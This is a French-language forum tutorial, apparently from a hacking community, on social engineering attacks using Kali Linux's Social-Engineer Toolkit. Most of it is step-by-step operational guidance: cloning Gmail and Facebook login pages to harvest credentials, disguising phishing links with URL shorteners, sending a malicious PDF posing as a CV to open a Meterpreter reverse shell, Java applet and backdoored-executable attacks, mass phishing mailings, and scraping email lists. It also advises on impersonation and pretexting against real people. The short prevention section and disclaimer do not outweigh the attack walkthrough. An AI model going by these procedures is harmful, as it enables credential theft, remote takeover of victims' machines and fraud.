Social Engineering
Un V.1 on se croirais dans le dernier Film de Spielberg non juste qu'avant de passer au reste je me suis dit mais mince le SE mérite bien un tuto à lui tout seul. Attention je n'ai entrevu qu'une partie du SE car le fil directeur reste l'utilisation de Kali et de ses Tools.
Suite à ce que j’ai pu entrevoir ces derniers mois, je me suis décider à partager avec vous une partie de mes connaissances en SE. Bien entendu, je n’ai pris en compte que l’utilisation de Kali-Linux puisque j’ai commencé depuis un certain temps à faire découvrir son usage à travers ses Tools.
Je pense également que si j’ai le temps, j’essaierais de vous parler aussi de ce qui se fait sans forcément des Logiciels ou scripts mais avec du bon sens pratique et de la Manipulation mentale. J’étudie depuis presque un an le Mentalisme grâce à l’invitation d’un ami sur un site privé. J’ai pu grâce à des intermittents du spectacle, des psychologues et divers autres spécialistes comprendre la puissance de la force mentale et ses applications.
Hacker en faisant du SE, ce n’est pas que rester derrière un Computer mais aussi sortir des sentiers battus et aller au charbon. Il faut être prêt à se découvrir et on comprend que SE le va plus loin que de connaître sa victime ou faire joujou avec des Programmes bien assis mais demande de l’assurance, de la détermination et surtout de la technique. J’ai utilisé presque toute ma vie le Mentalisme, ayant étudié la psychologie des individus au BU de ma Fac étant jeune. Cela m’a permis d’avancer dans la vie et de manipuler systématiquement des personnes pour arriver à mes fins. Mais cela est une autre histoire.
Vous avez du vous rendre compte que beaucoup de systèmes ont déployé des efforts énormes pour se sécuriser. Ils payent des professionnels pour que rien ne leur arrive mais malheureusement ils dépendent encore beaucoup de personnes physiques, d’humains qui ont des failles. La plus grande faille informatique et l’homme. Souvenez-vous-en !
Généralement, les employés ne sont pas au courant des astuces et techniques utilisées par les Hackers dans lesquels ils peuvent être utilisés en tant que médiateurs pour obtenir de précieux renseignements, telles que les détails de votre carte de crédit ou les secrets d'entreprise. La sécurité de l'ensemble de l'organisation peut être en jeu si un employé visite un site Web malveillant, répond à l'appel téléphonique d’un hacker, ou clique sur le lien malveillant qu'il/elle a reçu d’une pseudo factice compagnie par e-mail.
Vous avez du en entendre parler : du Phishing, Spear-phising, Click-jacking, web-jacking et j’en passe. Nous allons en parler tout au long de ce tutoriels et nous verrons comment s’en prémunir mais sachez que rien que la connaissance de l’attaque vous donne 80% de chance de ne pas en être une victime.
I-Introduction d’une attaque de SE
Nous allons introduire ce chapitre par SetoolKit, vous allez voir que ce formidable Tools va plus que nous mâcher une partie du travail. Pour travailler je passe par les lignes de commandes désoler mais je pense que l’on peut apprendre que comme ça. A force vous prendrez des automatismes et lorsque vous arriverez à Metasploit vous vous rendrez compte que cela vous a servis de prendre cette habitude.
Ouvrez un terminale puis tapez :
Code:
# cd /usr/share/set # ls # setoolkit
A) Compréhension des attaques par ingénierie sociale
Sociale Engineering vient d’ingénierie et de sociale. Alors que l'ingénierie signifie une méthode définie pour l'exécution de la tâche en suivant certaines étapes pour atteindre la cible, sociale est ce que l’on vit chaque jour dans notre vie ou notre travail. Nous vivons en société et sommes assujettis à des règles, des codes (Vestimentaires, lois, rang, …). Cela nous impose des choix, le SE va influencer ses choix par le biais de programmes qui vont automatiser son attaque et lui permettre de percer la défense sociale de la cible afin de récupérer les informations qu’il convoite.
Plusieurs choix d’attaque s’offre à nous suivant l’analyse en Aval que nos aurons fait. Cela va dépendre des personnes engagées, des systèmes et informations reçus lors de l’analyse d’énumération. Dans la phase de recherche, l'attaquant tente de recueillir des informations sur la cible. Les informations sur la cible peuvent être collectées à partir de diverses ressources et de moyens, tels que la fouille de poubelles, le site Web de l'entreprise, des documents publics, des interactions physiques, téléphoniques et ainsi de suite. La recherche est nécessaire pour cibler un seul utilisateur qui sera notre cible. Rappelez vous ou consultez mon précédent tutoriels sur les Tools Kali et la recherche d’informations, inspirez vous en afin de faire votre petite enquête.
Dans cette phase, l'attaquant fait le mouvement initial en essayant de démarrer une conversation avec la cible sélectionnée après l'achèvement de la phase de recherche. Le principal objectif de cette étape est de rendre la relation plus forte et continuer le dialogue pour exploiter la relation et obtenir les informations souhaitées pour laquelle la communication a été lancée. Il s'agit de la dernière phase de l'attaque par ingénierie sociale, dans laquelle l'ingénieur social quitte la scène attaque ou arrête la communication avec la cible, sans créer une scène ou de faire quoi que ce soit qui va faire la cible suspecte. Une fois la relation établie et suivant son degré de confiance nous allons pouvoir procédé à l’attaque SE.
Beaucoup de techniques se sont imposés mais parfois l’imbécilité d’un administrateur système suffit. Pour exemple, cet ancien site d’un ami qui m’avait demandé de lui mettre en place ainsi que le design et la sécurité. Tant bien que mal le site tourner bien. Arrivant à plus de 10000 membres il a du prendre un staff, puis il a passé une modératrice qu’il connaissait depuis longtemps Admin avec passe droit. C’était au cas où il lui arriver un truc. Mais voila la jeune novice Admin s’est trouver une amie handicapé sur FB qui en plus étaient ingénieur informatique. Cette personne un jour où le big boss n’était pas la lui a demandé conseil comme d’habitude.
Salut ma belle tu va bien ?
Oui et toi ?
Ben en fait j’ai un soucis et Z (on dira qu’il s’appelle Z et elle R) n’est pas la
Ok montre-moi par skype
Ben te suffit de faire ça dans le panel et c’est tout.
Ok ThX
De rien mais tu devrais lui dire que son thèmes il a un module avec failles énormes
Sérieux ???
Oui et en ce moment ils piratent tous ce même module il a été placardé sur Zero-Day
mais comment je peux faire
C’est compliqué comment te dire mince fff tu ne peux pas me mettre des accès ?
Non sais pas faire non plus mais si tu veux je peux te filer les miens
Ok envoie sur skype tes accès je m’en occupe tu diras que c’est toi quand il viendra il sera fier
Merciiiiiii ma louloute
De rien R ca me fait plaisir et sur ma chaise je peux rien faire d’autres taçon
Je sais ma pauvre big biz a toi te laisse on me phone voila mes passes a+++
Et voila le travail plusieurs techniques de Mentalisme ont été mis en œuvre après ce rapprochement via FB comme par exemple l’empathie. Mais le mal a été fait la personne qui n’étais qu’un hacker de 15ans un garçon a poser un backdoor et a laisser le tout mijoter quelques mois puis a fait son travail en défacant le site mais en ayant récolter un maximum d’informations avant. Cela aurait pu être évité mais l’ignorance et la confiance d’une seule personne a compromis tout le système.
Voyons les différentes techniques d’attaques possibles :
Piggybacking: Dans ce type d'attaque, le pirate profite en piégeant le personnel autorisé à pénétrer à l'intérieur d'une zone restreinte de la société ciblés, tels que la salle des serveurs. Par exemple, l'attaquant X pénètre dans la société ABC comme un candidat pour une interview, mais plus tard pénètre dans une zone restreinte en piégeant une personne autorisée, en affirmant qu'il s'agit d'un nouvel employé de la société et donc il n'a pas un ID employé, et à l'aide de l'ID cibles peut usurper une identité. Une fois dans la place il pourra recueillir des informations à partir d'un ordinateur de bureau ou même compromettre le service entier en introduisant un virus. Le Hacker peut utiliser un costume pour argumenter son attaque sociale. Dans le Mentalisme on parle souvent de cette utilisation du costume pour créer un renforcement sociale envers la cible. Imaginons que l’on veut des informations sur une banque, on connaît l’adresse e-mail et postale du directeur. On sait par recherche que son fils dont on a le FB a eue des soucis avec la police lors d’une soirée arrosé et a accrochée une autre voiture. On pourrait très bien aller chez cette personne se faire passer pour l’agent d’assurance car il y a eu plainte. Un costume avec une mallette, quelques papiers récupéré ou plutôt subtilisé dans une agence d’assurance et on fait la farce. La peur est mauvaise conseillère et nous faire faire parfois des choses inattendus.
Usurpation d'identité : Naturellement c'est le Baba du SE.Il donne lieu à des techniques impressionantes et à pour but d'intégrer le pivoting. Passer d'un bureau à l'autre pour avoir les informations recherchés.
Ingénierie sociale inverse: La on va chercher à conforter les personnes dans un sentiment d'impuissance en se mettant en position d'autorité. Comme dans le premier exemple où l'on est en position de force vis à vis de l'infraction du fils.
Dumpster diving: C'est la fouille des poubelles. Le hacker va visualiser tout ce qu'il peut en ramassant au sol, dans les corbeilles, ... qui pourrait lui donner un avantages pour la phase d'exploitation.l
Se présentant comme un légitime utilisateur: Bonjour la banque X j'ai perdus mon mot de passe pour acceder à mes dossiers. Le petit plus le demander en direct et affronter un bureau. Certains on le culot d'aller voir le directeur alors qu'il ne bosse pas dans la société. J'ai un amis en BTS qui avait arreter les études jugé inutile. Il s'est fait passer pour un gars d'une boite d'electronique , il a ainsi pu vérifier qu'il chercher du personnel dans le secteur ascenceur et maintenance. Il a créé un CV avec son BTS et pleins de faux diplômes , il a été engeagé avec un CDI. Nous on bucher encore , il est venus nous narguer avec sa voiture de fonction
Attention ces exemples sont pour certains fictifs, et dans la réalité les peines encourus sont lourdes en cas d’usurpation d’identité, violation de bien privé et j’en passe.
Bon on va revenir à notre Kali et reprendre une voie d’attaque SE via logiciels. Voyons ensemble les principales attaques via computer cette fois:
• Pop-up Windows : Par le biais de Pop up, on va amener les utilisateurs à cliquer sur un lien hypertexte qui redirige les utilisateurs et les force à visiter la page web de l’attaquant, en leur demandant de donner leurs informations personnelles ou leur demander de télécharger un logiciel qui pourrait avoir joint des virus.
• attaque d’Initié (Inside Attack) : Ce type d'attaque est exécuté à partir de l'intérieur de la cible Réseau. La plupart des attaques internes sont orchestrés par des employés mécontents qui ne sont pas satisfaits de leur position dans l'organisation ou parce qu'ils ont des rancunes personnelles contre un autre employé ou la Direction.
• Phishing: Des spammeurs qui envoient souvent des courriels en masse et prétendre être d’une instance officiel (caf, FB, banque, loto,…). Ils vous demandent de cliquer sur un lien dans l'e-mail pour fournir les détails de votre carte de crédit ou entrer des informations telles que votre prénom, adresse, âge, et la ville. Cette méthode va permettre d’obtenir rapidement des informations et directement de la source. Le hacker pourra aussi faire un clone du site officiel afin d’avoir un visuel plus accrocheur.
• l’escroquerie nigériane 419 (The "Nigérian 419" scam) : Dans l'escroquerie nigériane, l'attaquant demande à la cible de faire des paiements francs ou faire des transferts d'argent. On l'appelle 419 parce que '4-1-9' est une section du Code pénal nigérian qui déclare cette pratique illégal. L’attaquant ou scammers envoient un e-mail à la victime en lui demandant de l’argent car cette personne est coincé dans un pays. Dernièrement une histoire similaire a encore frappé un pauvre bougre qui a donner quotidiennement de l’argent à une femme camerounaise ( on se comprends ) qui avait des soucis pour venir le voir à France.
• l'attaque SE par un SMS falsifié : Dans ce type d'attaque, le hacker enverra un SMS à la cible prétendant être du département de sécurité de leur banque et demandant avec urgence que la cible appelle le numéro indiqué. Une personne qui se laisse prendre toujours par cet aspect urgence, grave, problème,… enverra des informations à un hacker. Le SE ne pratiquera l’attaque qu’une fois sur qu’elle aboutira et surtout ne parlera d’argent qu’une fois qu’il sera certains que la personne ne coupera pas le contact. C’est le But du SE l’information sous toutes ses formes et surtout à tout prix.
Voila ce petit cours succinct inspiré de plusieurs PDF et cours que j’ai pu lire s’achève ici passons à la pratique avec Kali.
Kali Linux>Exploitation Tools>Social Engineering Toolkit>se-toolkit
Vous voila dans l’interface du script. Vous pouvez sans tarder updater en tapant 4 puis 5.
B)Attaque par Website Cloning
Nous allons créer un clone d’un site ou autre et une fois fait envoyer cette url à la cible. Cette dernière lorsqu’elle se connectera à notre site factice, nous donnera en même temps ses ID.
Tapez sur 1 : 1) Social-Engineering Attacks
Cela ouvre un autre menu :
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
Et encore un menu
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
No us voila enfin dans le vif du sujet.
1) Web Templates
2) Site Cloner
3) Custom Import
2) Site Cloner
3) Custom Import
Ouvrez un terminale à côté et tapez :
Code:
# ifconfig –a
https://accounts.google.com
Si Apache n’est pas en route il vous le signale et vous demande si vous voulez qu’il le démarre répondez Y et cliquez pour la suite. Il vous signale que le clone a été bien effectué et que son chemin est : All files have been copied to /var/www.
Vous aurez index.html avec Gmail clone dedans. Chaque fois que quelqu’un essaiera de se connecter vous aurez un fichier .txt noté Harvester avec la date et l’heure, ouvrez le avec leafPad ou un autre éditeur de texte. A l’intérieur vous aurez les ID de la cible.
C’est clair qu’envoyer tel quel notre url ne fera pas de victime loin de la, on la voit venir à 200km cette url mais on peut essayer avec ses sites online de modifier un peu l’url.
• Https://bitly.com/: cette offre une redirection des URL de service en temps réel suivi de lien.
• Tinyurl.com/: avec TinyURL, vous pouvez faire une URL plus petit, afin qu'il puisse fonctionner pour n'importe quelle page de votre site.
• 1url.com/: C'est un libre raccourcissement des URL et service de redirection.
• Http://cli.gs/: cette offre personnalisable url ainsi que le suivi et la redirection d'URL. D'autres caractéristiques uniques comprennent privé, en temps réel, et très détaillée des états ainsi que géo-cible les URL en fonction du pays du visiteur.
Les solutions pour enrayer ce problème. Informez les personnes sensibles. Cette attaque est extrêmement compliquée à mettre en œuvre pour le hacker car elle se voit vite. Regardez le bas de page de votre navigateur avant de cliquez. Utilisez des services anti-spam, anti-Phishing. on peut aussi Changez régulièrement de mot de passe surtout en cas de doute, utilisez une Longueur et une complexité de mots de passe suffisante, un Compte se bloquant après un nombre d'essais ratés et aussi la réouverture de session en cas d’échec peuvent être des solutions pour minimiser les risques.
II-Les Vecteurs D’attaque
Nous allons voir parallèlement au chapitre précédent :
• Web jacking
• Spear-phishing
• Java applet attacks
A)WebJacking Method
Cette méthode fonctionne en faisant un clone du site web (comme Tal) et à envoyer ce lien malveillant à la cible indiquant que le site original a été déplacé. Lorsque l'URL en surbrillance est cliquée, une fenêtre pop up s’ouvre. Cette méthode utilise iframe remplacement pour rendre l'URL en surbrillance link apparaissent légitimes.
Allez c’est partis : Cliquez déjà sur suivez le guide
1) Social-Engineering Attacks
2) Website Attack Vectors
5) Web Jacking Attack Method
2) Site Cloner
Ouvrez le navigateur et allez sur l’url http://VotreIP/
Pareil qu’avant aller dans /var/www
Vous y trouverez vos fichiers avec les ID des personnes connecté mais 2 index le premier si vous l’ouvrez vous y verrez la redirection.
Vous pouvez changer à loisir le mot de redirection
B)Spear-Phishing
Bien nous avons dans la première phase de reconnaissance puis d’énumération récolter une quantité d’informations sur notre cible : comme l'adresse d'IP, IP adressent la gamme, les numéros de téléphone, l'adresse de bureau, et l'adresse e-mail officielle d'une personne importante dans l'organisation.
Le Spear-Phishing fait partie des attaques les plus importantes de nos jours surtout depuis l’avancé des nombreux Tools sur ce sujet. On l’appelle aussi APT attaque (advance persistent threat).
Allez c’est partis :Suivez le guide
1) Social-Engineering Attacks
2) Spear-Phishing Attack Vectors
Oulla un nouveau menu, je vais vous expliquer.
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
La 3eme attaque est utilisée pour créer notre propre modèle ou objet d'un courrier.
Dans cet exemple, nous allons prendre la deuxième attaque, créez un fichier Payload fileformat. Nous allons utiliser un exemple de scénario de l'envoi d'un CV pour le département des RH d'une entreprise en malveillantes format PDF. Une fois que le fichier est ouvert dans l'ordinateur cible, nous aurons un Shell.
Nous allons donc vérifier comment effectuer une masse attaque par e-mail :
Code:
Set : phishing>1
On choisis le payload 12.
12) Adobe PDF Embedded EXE Social Engineering
Il nous donne encore 2 choix :
Nous pouvons utiliser n'importe quel fichier PDF à partir de notre système pour créer un fichier PDF malveillant pour l'attaque,
Ou on peut éventuellement utiliser le fichier vide par défaut qui est fourni par le payload.
On va prendre la 2 eme option :
Une fois notre fichier, format et type choisis on a le choix du payload pour finaliser notre exploit.
Je ne vais pas détailler chacun sinon le tuto n’en finirais pas renseigner vous le nom est explicite.
On va prendre le : 2) Windows Meterpreter Reverse_TCP
On a à droite une explication : Envoyer un Shell Meterpreter sur la victime sous forme donc d’un PDF Malveillant et renvoyer à l’attaquant une connexion.
Une fois choisis on vous demande l’IP de la machine cible et le port 443 par défaut laisser le et cliquer sur la suite. Il va générer le PDF qui s’appellera par exemple : moo.pdf
Vous pouvez soit : 1 le garder tel quel ou 2 changer son nom c’est clair que l’on peut trouver mieux.
Tapez 2 et renommez le comme vous voulez : Mon_CV.pdf par exemple
La on vous propose de l’envoyer qu’à une seule personne par e-mail ou à plusieurs cliquez 1 ou 2.
Moi je clique 1
1. Pre-Defined Template
2. One-Time Use Email Template
2. One-Time Use Email Template
Simple en 2 vous construisez vous-même votre contenu d’envoie pour le PDF dans le 1 vous choisissez ceux par défaut. Cliquez 1 on verra par la suite.
On va prendre le 6 : Order Confirmation
Mettez le Mail de la Victime puis choisissez votre envoie moi je mets 1 par mon Gmail, Entrer le Gmail puis le nom d’envoie et finalement le mot de passe. Si vous avez peur créé vous un mail factice d’envoie. Choisissez si vous voulez envoyer ce message en haute priorité ou non. Je mets Y yes et voila envoyer.
Dès que la cible ouvre le mail et enregistre sur son PC le document PDF, sa machine sera compromise et reverse Meterpreter session sera ouvert à l'attaquant. Dès que la cible exécute l'outil de transfert, ce qui est généralement le fichier lié, Meterpreter établit un lien de réseau et envoie un appel à Metasploit sur le côté d'attaquant. Metasploit reçoit l'appel et configure le client, ce qui rend le Shell distant de la cible accessible à l'attaquant. Avec l'aide de Meterpreter, l'attaquant peut executer beaucoup de choses, comme le fait de télécharger un dossier et le fait d'exécuter un dossier sur la machine lointaine ou même lister des dossiers et fichiers.
C)Java Applet Attack
Un applet peut être décrit comme un programme Java exécuté sur un navigateur Web. Fondamentalement, le concept d'un applet Java vient du concept de l'incorporation dans un page HTML pour afficher l’applet, l'environnement d'exécution Java (JRE) est requis. La Java Virtual Machine peut être soit un plugin du navigateur Web ou une exécution séparée de l’environnement. Java Applet Attack est la plus célèbre et la méthode d'attaque la plus efficace pour compromettre un système. Il a été développé par Thomas Werth. Applet Java Attaque fonctionne sur Windows, Linux et Les plates-formes Mac OS.
On commence suivez le guide :
1) Social-Engineering Attacks
2) Website Attack Vectors
3) 1) Java Applet Attack Method
4) On clone on clone : 2) Site Cloner
5) set> Are you using NAT/Port Forwarding [yes|no]: no
6) Mettez L’IP cible de la machine
La on vous demande de choisir :
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
1. Faire mon propre certificat auto-signé applet.
2. Utilisez l'applet intégrée dans SET.
3. J'ai mon propre certificat de signature de code ou de l'applet.
On va tapez 2 et prendre celui du Tool ca ira plus vite et sans erreur. Entrez ensuite l’url du site à cloner moi je prends :
https://facebook.com/
Et pouf pas finis hé oui. Il faut choisir son payload de compromission maintenant.
On prends le même qu’avant : 2) Windows Reverse_TCP Meterpreter
Prenez : Backdoored Executable c’est le mieux de tous. Puis cliquez pour laisser 443 port par défaut.
Allez sur la page de votre http://votre_IP
Dés que la cible accepte la licence Java, Une session Meterpreter est ouverte et l’attaquant peut enfin exécuter sur le computer cible.
III-Création Set
A)Payload
Setoolkit a la particularité de laisser de la liberté pour la création de payload et divers.
Tapez 1 puis 4) Create a Payload and Listener
La prochaine étape dans la création du payload est de fournir l'IP de la machine attaquante où la liaison inverse pourra être faite. Une fois cette machine cible exploité, le payload devra ouvrir un Shell sur la machine cible. Entrez votre IP.
Choisissez le type de payload on va prendre 2) Windows Reverse_TCP Meterpreter
Choisissez encore 4) Backdoored Executable
Laissez 443 ou choisissez un autre moi je passe.
On vous demande si vous voulez commencez l’écoute tapez y et regardez.
B)Bombe Mailing
C’est le fait d’envoyer une attaque de type Ddos sur un Mail cible. On sature le mail qui bloque littéralement. Nous, On va voir comment avec Kali et Setoolkit faire une attaque par Mass Mail. C'est-à-dire que l’on va envoyer un mail avec un objet malicieux incorporé dans le corps du message : Trojan, ver, malware, keylogger, phishing,…
1)Social-Engineering Attacks
5)Mass Mailer Attack
2 options :
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
2. E-Mail Attack Mass Mailer
Votre liste doit ressembler à l’exemple :
[email protected]
[email protected]
[email protected]
/home/MA_Liste/ihazemails.txt Ou le chemin ou vous l’avez placer : exemple : /etc/ Liste pour moi
Ensuite on vous demande de donner votre mail, comme avant pareil. Puis, on va vous demandez si vous voulez que le message soit envoyer soit en texte soit en html : h ou p.
Choisissez puis renseigner le corps du message partie importante puisque vous allez y mettre par exemple l’url de votre page phishing.
IV-Autre Tools
Je vous avez dit que je vous parlerais d'autres Tools que l'on peut installer afin d'affiner et augmenter l'arsenal de Kali. En voici un premier exemple.
http://spl0it.org/projects/sef.html
Installation : Mettez les dépendances
Code:
# sudo perl -MCPAN -e 'install Net::SMTP'
Ensuite, décompresser le et lancer le :
Code:
# cd Desktop/SEF-1.0 # perl Makefile.PL # make # make install
Code:
# cd /usr/local/bin
sefemails, sefnames, sefphish, sefpayload Yes ils sont installé encore de news Tools pour kali
SefeMails
Sefemails est utilisé pour générer une liste d'adresses de courrier électronique dans le but d'effectuer une attaque de phishing en vrac contre une organisation spécifique. La syntaxe pour exécuter cet outil dans Kali Linux est comme suit :
sefemails [Options]
C’est partis on va prendre un site au pif paf pouf. Je ne vous donnerais pas le mien
sefemails -d gmail.com -n Name-List -s 2
Cela vous permet d’avoir tous les mails d’une cible à partir d’une liste de nom de ce site. Il vous faut pour cela avoir les noms et surtout le mail utilisé. Gmail,outlook,…
Sefphish
Tool pour envoyer en mail de masse du phishing. Il utilise un dossier de configuration YAML pour le rendre plus facile.
Sefnames
Ce Tool inverse des adresses de courrier électronique et extrait le nom complet de la victime. Il est utile lorsque vous avez plusieurs adresses e-mail que vous avez besoin de convertir à noms.
Sefpayload
# sefpayload <IP> <port> <Name Of the Exe> <Payload>
Outil pour générer un reverse_tcp metasploit meterpreter payload. Par défaut, elle suppose que Metasploit est installé dans /pentest/exploits/action urbain3.
Je ne m’attarderais pas plus sur ces derniers Tools car je ne les ai utilisé que très peu de fois et donc mes connaissances sont limités. Mais je vous engeage à les découvrir comme moi et peut être les adopter pour vos futures attaques.
En dernier lieu cette url pour tester on line Set:
https://attendee.gototraining.com/r/6666899010416816129
Pour vous donner une idée basique de Set. Je n’ai utiliser que la partie SE du script , je n’ai pas parler de Beef ou d’autres que je compte développer dans la partie Kali sur les attaques XSS et divers.J'espère que cela vous aidera pour vos futures essais.
Voici une petite aide supplèmentaire pour vous retrouver sur kali :
Vous pouvez faire :
Code:
# apt-get autoclean (les .deb téléchargés sont stockés dans /var/cache/apt/archives. autoclean: supprime les archives obsolètes.) # apt-get clean (efface tous les packages en cache) # whereis set (vous indique le chemin d'un dossier ou fichier que vous cherchez) set: /usr/share/set # cd /usr/share/set/ ./set (Vous allez sur le chemin indiquer et activer le script)
PS : J'explique dans un seule but de prévention. Je ne pirate jamais autrui et je vous conseille de faire de même. Tester sur vous même afin d'apprendre et reconnaître ce genre d'attaque.
Commentaire